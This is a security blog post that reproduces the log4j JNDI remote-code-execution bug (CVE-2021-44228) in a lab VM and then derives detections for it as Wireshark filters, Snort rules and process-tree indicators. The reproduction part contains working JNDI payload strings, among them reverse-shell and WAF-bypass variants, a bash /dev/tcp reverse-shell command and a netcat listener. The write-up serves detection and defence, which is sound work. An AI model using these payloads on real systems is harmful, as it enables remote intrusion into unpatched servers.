log4j JNDI Exploitation
Situation
A remote code execution (RCE) bug was found in log4j and assigned CVE-2021-44228. The vulnerability lies in how log4j interprets Java Naming and Directory Interface (JNDI) URLs. JNDI lets an application look up a service. An attacker can craft a string that looks like “${jndi:proto://host/a}”, where proto is ldap or rmi, and log4j will connect to the host to retrieve a response that would specify how to process the log entry. However, the response can instead provide Java bytecode that log4j will execute.
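To make the shape of the lookup string concrete, here is a minimal Python sketch that pulls the protocol, host, port, and path out of a plain ${jndi:...} string. The pattern and the function name parse_jndi_lookup are my own illustration, not part of log4j or any tool used in this post, and it deliberately handles only the simple, un-obfuscated form.

```python
import re

# Matches only the plain form ${jndi:proto://host[:port]/path}.
# Obfuscated or nested variants are intentionally out of scope here.
JNDI_PATTERN = re.compile(
    r"\$\{jndi:(?P<proto>[a-z]+)://(?P<host>[^/:}]+)(?::(?P<port>\d+))?/(?P<path>[^}]*)\}",
    re.IGNORECASE,
)

def parse_jndi_lookup(text):
    """Return (proto, host, port, path) for the first plain JNDI lookup, or None."""
    match = JNDI_PATTERN.search(text)
    if match is None:
        return None
    port = int(match.group("port")) if match.group("port") else None
    return (match.group("proto").lower(), match.group("host"), port, match.group("path"))

print(parse_jndi_lookup("User-Agent: ${jndi:ldap://127.0.0.1:1389/a}"))
```

The path component is the part that the malicious server interprets, which matters later when choosing a payload.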
log4j is used in a lot of places, so an attacker has many ways to submit malicious input: in a web form, as a User-Agent, by renaming their Tesla, or by sending a chat message in Minecraft. Where the vulnerability manifests depends on how that organization’s infrastructure is configured. For example, it looks like naming your AirPods in the right format can induce a remote connection from Apple’s iCloud servers. AirPods are synced across all devices that a user owns via iCloud, so presumably log4j is logging the AirPods name at some point during the sync process. Minecraft servers, and every user connected to the server, are getting popped because both the client and server use log4j to log chat messages.
In the rest of this blog, we’ll look at getting a Proof of Concept (PoC) running and what indicators we can extract from the networks and endpoints.
Get the PoC running
The first PoC I found was from tangxiaofeng7. It has a vulnerable “app” that simply calls log4j with a malicious endpoint. The GitHub page shows macOS Calculator.app being run as the payload. I’m going to use Ubuntu Linux as my test system, so I need to either figure out how to change the payload or find a different way of running payloads. During research, I found JNDIExploit. log4j is the “access” vector, but the actual bad thing happens due to JNDI. Let’s use that.
- Set up a new VM, Ubuntu 18.04. We need a Java Development Kit (JDK) and Maven. Clone both repos.
apt install openjdk-8-jdk maven
git clone https://github.com/tangxiaofeng7/apache-log4j-poc.git
git clone https://github.com/0x727/JNDIExploit
- Build the projects. I spent way more time than I’d like trying to figure out how Java projects work.
cd JNDIExploit/
mvn package
cd target
java -jar JNDIExploit-1.3-SNAPSHOT.jar -i 0.0.0.0
ss -anpt shows 1389/tcp and 3456/tcp listening, great success. 1389 is an LDAP endpoint that will “instruct” the vulnerable log4j function to connect to another location and execute the bytecode found there. 3456 is an HTTP server that hosts the malicious bytecode. Unfortunately, a straight build does not work for the log4j PoC. I had quite a few problems getting org.apache.logging.log4j to load. There seem to be several ways to get it working, but here’s what I did.
cd ~/apache-log4j-poc
vim pom.xml
The POM file is a manifest for the Maven project. We add the maven-shade-plugin to generate an Uber JAR that includes log4j jars.
<build>
  <plugins>
    <plugin>
      <groupId>org.apache.maven.plugins</groupId>
      <artifactId>maven-shade-plugin</artifactId>
      <version>2.4.1</version>
      <executions>
        <execution>
          <phase>package</phase>
          <goals>
            <goal>shade</goal>
          </goals>
          <configuration>
            <transformers>
              <transformer implementation="org.apache.maven.plugins.shade.resource.ManifestResourceTransformer">
                <mainClass>log4j</mainClass>
              </transformer>
            </transformers>
          </configuration>
        </execution>
      </executions>
    </plugin>
  </plugins>
</build>
Now we can build with mvn clean package. This removes everything in the target directory and then packages the project into a .jar. We can then execute it with java -jar target/log4j-rce-1.0-SNAPSHOT.jar. If we do, we see the message
01:27:16.300 [main] ERROR log4j - ${jndi:ldap://127.0.0.1:1389/a}
And in the terminal window where JNDIExploit is running, we see
[+] Received LDAP Query: a
[!] Invalid LDAP Query: a
If we run java -jar JNDIExploit-1.3-SNAPSHOT.jar -u we see the list of endpoints we can specify. We need to match the a value to a legitimate endpoint that JNDIExploit is serving. Edit apache-log4j-poc/src/main/java/log4j.java to call something legitimate. Inside the main class, I put a bunch of payloads so I can later compare what happens.
logger.error("${jndi:ldap://127.0.0.1:1389/Basic/Command/whoami}");
logger.error("${jndi:ldap://127.0.0.1:1389/Basic/Dnslog/---.canarytokens.com}"); // get your own token at https://canarytokens.org/generate#
logger.error("${jndi:ldap://127.0.0.1:1389/Basic/Command/Base64/d2hvYW1pCg==}"); // whoami
logger.error("${jndi:ldap://127.0.0.1:1389/Basic/ReverseShell/127.0.0.1/4444}");
logger.error("${jndi:ldap://127.0.0.1:1389/Basic/TomcatEcho}");
logger.error("${jndi:ldap://127.0.0.1:1389/Deserialization/CommonsCollectionsK1/Dnslog/---.canarytokens.com}");
logger.error("${jndi:ldap://127.0.0.1:1389/TomcatBypass/Dnslog/---.canarytokens.com}");
logger.error("${jndi:ldap://127.0.0.1:1389/WebsphereBypass/Upload/Dnslog/---.canarytokens.com}");
logger.error("${jndi:ldap://127.0.0.1:1389/TomcatBypass/Dnslog/---.canarytokens.com}");
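The Basic/Command/Base64 endpoint above carries the command as a Base64 string. As a quick sanity check, this small Python sketch decodes the value used in the payload and shows how another command could be encoded the same way. The helper names are mine. The trailing newline in the decoded value suggests the string was produced with something like echo whoami | base64, but that is a guess.

```python
import base64

def encode_command(command):
    """Base64-encode a command string for a .../Command/Base64/<value> path."""
    return base64.b64encode(command.encode("utf-8")).decode("ascii")

def decode_command(value):
    """Decode a Base64 value back into the command string."""
    return base64.b64decode(value).decode("utf-8")

# The value from the payload list decodes to the command plus a newline.
print(repr(decode_command("d2hvYW1pCg==")))
print(encode_command("whoami\n"))
```

Note that standard Base64 output can contain / and + characters. I have not checked how JNDIExploit handles those inside a lookup path, so treat longer commands as something to test rather than assume.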
Once edited, we call mvn clean package again and then re-run the jar. This time, we see errors like 01:31:06.557 [main] ERROR log4j - Reference Class Name: foo, however we get successful connections to JNDIExploit that look like:
[+] Sending LDAP ResourceRef result for Basic/Command/Base64/d2hvYW1pCg== with basic remote reference payload
[+] Send LDAP reference result for Basic/Command/Base64/d2hvYW1pCg== redirecting to http://0.0.0.0:3456/ExploittvsunipOlR.class
If we had a packet capture running at this point, we’d see that the LDAP server is being connected to, but the HTTP server running on 3456/tcp is not. It turns out we’ve known since 2016 that JNDI is a vector for exploitation, and since Java 8u191 the default has been to not load classes from a remote codebase URL returned by an LDAP lookup. So we need to add System.setProperty("com.sun.jndi.ldap.object.trustURLCodebase","true"); to log4j.java, before we call logger.
Now everything should work. I’ll start tcpdump to capture packets before re-running the vulnerable jar (tcpdump -i lo -s 65535 -w /home/user/ldap.pcap tcp port 1389 or tcp port 3456), and start a netcat listener to catch the reverse shell (nc -nvlp 4444). This time, both the LDAP and HTTP servers receive connections, the DNS canary token is triggered, and the listener receives a reverse shell.
Observables
Killchain scenarios
How can we detect or hunt for this activity? There are 2 scenarios that I’ve identified so far. Scenario 1 involves the LDAP JNDI lookup returning a javaNamingReference object that specifies a “second stage”. Two network connections are initiated from the vulnerable machine in this scenario - one to an LDAP server to perform the lookup, and a second to an HTTP server to download a Java object. This is the scenario demonstrated by the PoC (https://github.com/tangxiaofeng7/CVE-2021-44228-Apache-Log4j-Rce). In the JNDIExploit framework, the “Basic” payloads use this scenario. We can see this in the following PCAP screenshot.
A flow chart of this scenario looks like:
Scenario 2 is where the LDAP JNDI lookup returns a javaSerializedData object. Only one network connection is made in this scenario. The searchResEntry object contains an attribute javaSerializedData which is exactly that: a serialized Java object. This object is deserialized on the vulnerable host and the payload it carries is executed. Its flow chart:
Detections
Network
Can we detect malicious input? The whole purpose of log4j is to log, so the malicious input is going somewhere. Is that log being centralized and indexed? Can we prevent the attack at (1)? Maybe. If the input vector is in line with something like a Web Application Firewall (WAF), you might be able to block it before it gets to the vulnerable function. However, not every implementation has that opportunity, and even if you do, there are a lot of permutations that could make blocking with a WAF hard. A lot of the detection work that I’ve seen is focused on the input. This makes sense, because we want to prevent the attack from happening in the first place. My personal opinion is that this is a whack-a-mole approach of trying to detect each new bypass technique as it is developed.
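To illustrate the whack-a-mole problem, here is a small Python sketch of a naive input filter and one publicly discussed permutation that slips past it. The nested ${lower:j} form relies on log4j's lower lookup resolving to j before the outer lookup is evaluated. The filter itself is hypothetical and far simpler than any real WAF rule.

```python
import re

# A naive filter that only looks for the literal "${jndi:" prefix.
NAIVE_FILTER = re.compile(r"\$\{jndi:", re.IGNORECASE)

def naive_block(text):
    """Return True if the naive filter would flag this input."""
    return NAIVE_FILTER.search(text) is not None

samples = [
    "${jndi:ldap://127.0.0.1:1389/a}",           # plain form
    "${${lower:j}ndi:ldap://127.0.0.1:1389/a}",  # nested lookup hides the prefix
]

for sample in samples:
    print(naive_block(sample), sample)
```

The first sample is flagged and the second is not, even though both would be expected to resolve to the same lookup on a vulnerable log4j version. Each new nesting trick needs another rule, which is why I'd rather also look at what happens after the input is processed.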
Can we detect the LDAP queries? By default, yes we should be able to. LDAP normally occurs over 389/tcp. However, we saw with JNDIExploit that it was running LDAP on 1389. Changing the port can obscure the traffic, but a protocol dissector can still identify LDAP since it is clear text. We can inspect outgoing traffic for LDAP using a tool like Suricata, and potentially block once it is observed.
Looking through the PCAPs that were made earlier, we can observe that there is a sequence of bytes in the packet payload that is the same for every LDAP query. We’ll call these magic bytes since they fingerprint the protocol. In Wireshark, the following display filter showed only the LDAP queries.
data[0:1] == 0x30 && (data[2:4] == 02.01.02.63 || data[3:4] == 02.01.02.63)
In this screenshot we see these values highlighted in the hex dump. I’m not sure why the 02.01.02.63 sequence occurs sometimes at offset 0x2 and sometimes at 0x3.
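A likely explanation for the shifting offset is BER length encoding. An LDAP message starts with 0x30 (SEQUENCE) followed by a length. Lengths under 128 fit in one byte, while longer messages use a prefix such as 0x81 plus one more length byte, which pushes everything after it one byte to the right. The 02 01 02 that follows is the messageID (INTEGER, length 1, value 2) and 0x63 is the tag for a searchRequest. The Python sketch below walks those fields. The function name and the sample bytes are made up for illustration, not taken from my capture.

```python
def locate_ldap_op(payload):
    """Return (offset_of_message_id, message_id, protocol_op_tag) or None."""
    if len(payload) < 2 or payload[0] != 0x30:  # 0x30 = SEQUENCE
        return None
    first_len = payload[1]
    if first_len < 0x80:
        offset = 2                        # short form: one length byte
    else:
        offset = 2 + (first_len & 0x7F)   # long form: 0x81 adds 1 byte, 0x82 adds 2
    # messageID is an INTEGER (tag 0x02) with its own one-byte length
    if len(payload) < offset + 2 or payload[offset] != 0x02:
        return None
    id_len = payload[offset + 1]
    id_end = offset + 2 + id_len
    if len(payload) <= id_end:
        return None
    message_id = int.from_bytes(payload[offset + 2:id_end], "big")
    return offset, message_id, payload[id_end]

short_form = bytes([0x30, 0x0C, 0x02, 0x01, 0x02, 0x63, 0x07])
long_form = bytes([0x30, 0x81, 0x90, 0x02, 0x01, 0x02, 0x63, 0x81])
print(locate_ldap_op(short_form))
print(locate_ldap_op(long_form))
```

If this is right, queries with a long lookup path (for example the Deserialization endpoints) would show the sequence at offset 3, and short ones at offset 2.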
Can we detect the LDAP responses? Remember there are two scenarios. One is a response with javaSerializedData and the other is javaNamingReference. The observed magic bytes for javaSerializedData are ac:ed:00:05:73:72:00. A Wireshark display filter is:
data[0:1] == 0x30 && data[1:1] == 0x82 && tcp contains ac:ed:00:05:73:72:00
For javaNamingReference, it is the string “javaNamingReference”. In Wireshark that’s:
data[0:1] == 0x30 && data[1:1] == 0x81 && tcp contains 6a:61:76:61:4e:61:6d:69:6e:67:52:65:66:65:72:65:6e:63:65
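The same two checks can be applied to raw TCP payload bytes outside Wireshark. This is a minimal Python sketch under my own naming. It keeps the 0x30 check and the content markers from the filters above but drops the 0x81/0x82 length-byte condition, since that depends on how large the response happens to be.

```python
# Magic bytes and marker string taken from the display filters above.
JAVA_SERIALIZED_MAGIC = bytes.fromhex("aced0005737200")
NAMING_REFERENCE = b"javaNamingReference"

def classify_ldap_response(payload):
    """Return which scenario a raw LDAP response payload looks like, or None."""
    if not payload or payload[0] != 0x30:  # LDAP messages start with SEQUENCE
        return None
    if JAVA_SERIALIZED_MAGIC in payload:
        return "javaSerializedData"
    if NAMING_REFERENCE in payload:
        return "javaNamingReference"
    return None

# Synthetic payloads for illustration only, not real captures.
print(classify_ldap_response(b"\x30\x81\x50...objectClass..javaNamingReference.."))
print(classify_ldap_response(b"\x30\x82\x01\x00..." + JAVA_SERIALIZED_MAGIC))
```

The hex string in the second Wireshark filter is just the ASCII encoding of javaNamingReference, so searching for the text directly is equivalent.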
Can we detect the HTTP transfer of Java bytecode? By default, yes we should be able to. HTTP is cleartext. I think due to the presence of HTTP headers, Wireshark was able to automatically decode traffic over 3456/tcp. Zeek/Suricata may be able to do this as well. If so, it should be fairly simple to look for Java bytecode being sent over the wire. This Wireshark filter will show the Java magic bytes 0xcafebabe being sent:
data.data[0:4] == ca:fe:ba:be
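Outside Wireshark, the same magic-byte check is easy to apply to a reassembled HTTP body or a file carved from the wire. This Python sketch reads the first eight bytes of a class file: the 0xCAFEBABE magic followed by the minor and major version. The function name is mine, and the sample header is synthetic (major version 52 corresponds to Java 8).

```python
import struct

def parse_class_header(data):
    """Return (minor, major) if data starts with a Java class file header, else None."""
    if len(data) < 8:
        return None
    # Class files are big-endian: u4 magic, u2 minor_version, u2 major_version.
    magic, minor, major = struct.unpack(">IHH", data[:8])
    if magic != 0xCAFEBABE:
        return None
    return minor, major

print(parse_class_header(bytes.fromhex("cafebabe00000034")))
```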
And Zeek successfully sees the file:
Host
What can we detect on host? This is the tough one. On one hand, you can detect “weak” attacks that spawn new processes. Here is the process list (ps -efwwwH) from the reverse shell:
root 9171 1 0 01:38 pts/4 00:00:00 /bin/bash -c /bin/bash -i >& /dev/tcp/10.10.10.146/4444 0>&1
root 9172 9171 0 01:38 pts/4 00:00:00 /bin/bash -i
root 9194 9172 0 01:38 pts/4 00:00:00 ps -efwwwH
The clear indicator is the /dev/tcp trick to create a TCP connection. Here, bash is a child of init. This may be implementation specific. The PoC is a single-function .jar file. Once the java process exits, its children (bash in this case) are orphaned and re-parented to init. On a “real” server application, the java process is not likely to exit after log4j is called, so the process tree will look different. What we should see in that case is java as the parent of bash. After modifying the PoC to sleep for 10 minutes after calling the logger function, that’s exactly what we see:
root 10926 10770 7 14:31 pts/5 00:00:00 java -jar target/log4j-rce-1.0-SNAPSHOT.jar
root 10948 10926 0 14:31 pts/5 00:00:00 ping -c 1 ---.canarytokens.com
root 10956 10926 0 14:31 pts/5 00:00:00 /bin/bash -c /bin/bash -i >& /dev/tcp/10.10.10.146/4444 0>&1
root 10957 10956 0 14:31 pts/5 00:00:00 /bin/bash -i
root 10975 10957 0 14:31 pts/5 00:00:00 ps -efwwwH
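As a rough hunting aid, the two indicators above (a shell whose parent is java, and /dev/tcp in a command line) can be checked against ps -ef style output. This is a minimal Python sketch with hypothetical helper names. It assumes the standard eight-column ps -ef layout and is not a substitute for proper endpoint telemetry.

```python
SHELLS = {"sh", "bash", "dash"}

# Process list from the modified PoC above.
SAMPLE_PS = """\
root 10926 10770 7 14:31 pts/5 00:00:00 java -jar target/log4j-rce-1.0-SNAPSHOT.jar
root 10948 10926 0 14:31 pts/5 00:00:00 ping -c 1 ---.canarytokens.com
root 10956 10926 0 14:31 pts/5 00:00:00 /bin/bash -c /bin/bash -i >& /dev/tcp/10.10.10.146/4444 0>&1
root 10957 10956 0 14:31 pts/5 00:00:00 /bin/bash -i
root 10975 10957 0 14:31 pts/5 00:00:00 ps -efwwwH
"""

def basename_of(cmd):
    """Name of the executable at the start of a command line."""
    parts = cmd.split()
    return parts[0].rsplit("/", 1)[-1] if parts else ""

def find_suspicious(ps_output):
    """Return (pid, ppid, cmd) for shells spawned by java or commands using /dev/tcp."""
    procs = {}
    for line in ps_output.splitlines():
        fields = line.split(None, 7)  # UID PID PPID C STIME TTY TIME CMD
        if len(fields) < 8 or not (fields[1].isdigit() and fields[2].isdigit()):
            continue  # skip the header row and malformed lines
        procs[int(fields[1])] = (int(fields[2]), fields[7])
    hits = []
    for pid, (ppid, cmd) in procs.items():
        parent_cmd = procs.get(ppid, (0, ""))[1]
        shell_under_java = basename_of(parent_cmd) == "java" and basename_of(cmd) in SHELLS
        if shell_under_java or "/dev/tcp/" in cmd:
            hits.append((pid, ppid, cmd))
    return hits

for hit in find_suspicious(SAMPLE_PS):
    print(hit)
```

The /dev/tcp check also catches the earlier listing where bash had already been re-parented to init, since it does not depend on the parent. An attacker who avoids spawning a shell at all would not show up in either check.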
Snort rules
I’ve turned the Wireshark display filters above into Snort rules. They can be found in this repo: kimobu/cve-2021-44228
Changelog
12/12/2021 - updated with additional detection information